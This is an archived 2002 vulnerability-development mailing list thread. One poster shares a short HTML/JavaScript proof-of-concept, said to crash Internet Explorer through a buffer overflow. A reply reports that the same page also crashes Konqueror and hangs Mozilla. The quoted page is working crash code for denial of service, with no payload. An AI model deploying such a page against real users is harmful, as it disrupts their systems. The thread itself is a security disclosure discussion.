Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: Re: Buffer Overflow with all versions of Internet Explorer and Javacript.

Re: Buffer Overflow with all versions of Internet Explorer and Javacript.

From: Scott Mackenzie <smackenz_at_sdf.lonestar.org>
Date: 03 Jun 2002 00:47:52 +0100

After a few minutes testing it seems this does not only effect Internet
Explorer but also the following browsers:

In KDE's konqueror Latest Version it Seg Faults the browser instantly

In Mozilla 0.99 it causes a Denial of Service situation against the
machine with 100% CPU usage, and some crazy hard drive accessing until
the process is killed

Other information:

Netscape 6 series latest version does nothing when SMASH! is clicked

Galeon latest tries to mail a rather long email address, but the browser
itself is un-effected

Test System:
Linux Redhat 7.3 2.4.18-4 #1 Thu May 2 18:06:25 EDT 2002 i686

---------------------------------
Scott Mackenzie
Cybernetics & Virtual Worlds (2)
Bradford University
http://smackenz.zapto.org
---------------------------------

On Sun, 2002-06-02 at 22:08, Matias Sedalo wrote:
> the 28/07/1999 I have discovered a stack buffer overflow caused by until
> the moment all the versions of the Internet Explorer.
> In many windows98 causes the necessity to reinitiate the equipment, since
> to my to seem it remains without memory.
> Only it has been proven in several versions 5 of IE on WindowsNT
> server sp6 and windows98 Second Edition. As I said before the Windows 98
> I had to reinitiate it to the force.
> Can be possible to execute arbitrary code using the variable company of
> the example?
>
> // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
> // internet Explorer 5.00.3500.1003 on Windows98se
>
> -----------cut here---------------------------
> <html><head></head>
> <script language="JAVASCRIPT">
> function hacerMail() {
> var company;
>
> crear();
> address="s0t4ipv6_at_shellcode.com.ar";
> soporte();
> }
> function soporte(){
> var soporte="bill_at_mocosoft.com";
> window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
> // window.location=company; // also this line cause the bof.
> close(hacerMail());
> }
> function crear(){
> company="shellcode here?\n"; // i don't think so.
> }
> </script>
> <input type="button" onClick="hacerMail();" value="SMASH!"></input>
> </html>
> -----------cut here---------------------------
>
> Regards.
>
> - Internet es perjudicial para la salud -
> - Ley N~ 127.0.0.1
>
> Matias Sedalo
> http://www.shellcode.com.ar
>
> s0t4ipv6_at_shellcode.com.ar
> B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
> .......................................
>
>
>
>
Received on Jun 03 2002

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]